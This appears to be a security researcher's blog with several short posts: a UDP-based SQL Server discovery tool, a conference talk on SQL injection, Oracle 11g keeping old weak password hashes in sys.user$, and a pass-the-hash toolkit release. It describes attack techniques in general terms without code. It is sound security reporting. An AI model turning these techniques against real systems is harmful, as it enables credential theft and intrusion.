I have been experimenting with SQL-injection and information enumeration through error messages for a while.
The idea was to simplify the process of extracting data so that very little application logic would be needed to perform the task. Ideally a simple 3-5 line bash-script wrapping wget or curl should do the trick.
I finally got to publishing a tool, which due to a number of reasons, has not happened for quite some time now. The MSSQLScan tool scans for Microsoft SQL Server *surprise*. It does so by using UDP which means that it can either discover servers by hitting a broadcast address or by querying each and everyone. This will make sure that you find all instances and servers that no longer use the 1433 TCP port due to dynamic port allocations.
As usual your more than welcome to provide me with feedback, suggestions or bug reports.
I attended the T2 security conference last Friday where I presented a talk on SQL injection and out-of-band channelling. Unfortunately I wasn’t able to stay for the whole conference but the talks I attended were very good. Make sure to check it out next year. Hopefully, I will have a chance to publish my updated slides during this week.
Finally, Oracle has made changes to the way they store passwords. Oracle 11g introduces a different algorithm (SHA1), supports mixed-case passwords and adds salts to stored passwords. This all sounds great EXCEPT that the old weaker hashes are still being stored in the sys.user$ table.
It seems as if several different people have been looking in to this at more or less the same time and have documented their efforts. One of them is Pete Finnigan http://www.petefinnigan.com/weblog/archives/00001097.htm. Recurity Labs have done a more technical analysis of the 150Mb Oracle Linux binary http://www.phenoelit.net/lablog/oracle.sl and conclude their work with this excellent comment:
“And we would like to welcome Oracle Corp. in the year 2007, the century of highly advanced, mixed-case passwords. 
It should be noted that Oracle, in fine tradition, makes the same mistake Microsoft did a decade ago when they put the insecure LANMAN hash next to the brand new NTLM one. The table sys.user$ still holds the case insensitive DES encrypted password version next to the new one.”
Core security released their PSH (passing-the-hash) toolkit today. Even though the concept of passing-the-hash is old, few tools putting it into practise have been available to the public. A number of companies working within security industry have had their own tools, some being more proud of them than others 
I myself attempted to write a generic proxy implementation for this in 2001 and published it here on cqure.net. It worked alright at the time, but has not done so for quite a while now.
In short passing-the-hash allows you to extract encrypted passwords (hashes) from a Windows system and use the hashes, without knowing the password, in order to authenticate to other Windows systems with users having the same passwords. The risk associated with this should be obvious to most people.